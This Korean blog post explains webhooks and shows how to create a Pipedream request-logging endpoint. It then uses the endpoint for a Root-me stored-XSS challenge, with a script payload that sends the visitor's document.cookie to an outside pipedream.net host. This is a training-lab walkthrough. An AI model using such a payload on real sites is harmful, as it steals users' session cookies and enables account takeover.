반응형
Webhook ① 서버 단에서 특정 이벤트를 외부에 전달하는 방법. ② 서버에서 작업 수행 시 해당 작업이 수행됨을 HTTP Post로 알림. ③ Webhook 구현 시 특정 작업이 수행된 URL에 대해 POST 방식으로 요청을 생성. ④ 한 시스템에서 발생하는 이벤트가 다른 시스템에 전달되어 처리되어야 할 때 사용.RequsetBin.com은 HTTP와 Webhook 정보를 요청/수집할 수 있는 사이트로
아래 주소에서 회원가입을 진행하고 pipdream으로 이동하면 기능을 이용할 수 있다.
https://requestbin.com/?gclid=EAIaIQobChMI0_28ua-O7wIVB6qWCh31CAMwEAAYASAAEgLUjPD_BwE
https://pipedream.com/
Pipdream에서 Sources 탭으로 이동하여 Create one 링크를 클릭한다.https://pipedream.com/
HTTP / Webhook 을 선택한다.
Response 정보를 설정하고 CREATE SOURCE 버튼을 클릭한다.
Source가 생성되면 HTTP 요청/응답을 받을 수 있는 엔드포인트 URL이 만들어진다.
해당 주소에 임의의 파라미터를 설정해 접근하면 EVENTS 로그를 통해 해당 파라미터로 전달받은 값을 확인할 수 있다.
https://14cc459041929db287ff1a6804a5c584.m.pipedream.net/?param1="test"¶m2="test2"
xss 테스트 사이트에서 전송한 쿠키값을 확인하는 용도로 해당 사이트를 이용할 수도 있다.
Root-me : web stored xss1
http://challenge01.root-me.org/web-client/ch18/
http://challenge01.root-me.org/web-client/ch18/
<script>document.write("<img src='https://14cc459041929db287ff1a6804a5c584.m.pipedream.net/
?cookie="+document.cookie+"'></img>");</script> "cookie"라는 파라미터를 설정하여 현재 이용자 쿠키값을 pipedream으로 전송하게 된다. pipdream은 이러한 HTTP 요청을 중계 서버에서 대신 받아 응답을 확인하는 용도로도 사용한다.
반응형
'유틸리티-사이트' 카테고리의 다른 글
| 이메일 주소 존재 유무 확인 사이트 (0) | 2021.04.05 |
|---|---|
| 임시 전화번호로 SMS 인증하기 (1) | 2021.03.08 |
| 템퍼몽키(tampermonkey) - 스크립트 관리 도구 (0) | 2021.03.01 |
| 와이어샤크 loopback 캡쳐하기 (0) | 2021.02.28 |
| 이미지 배경 제거해주는 사이트 (0) | 2021.02.28 |
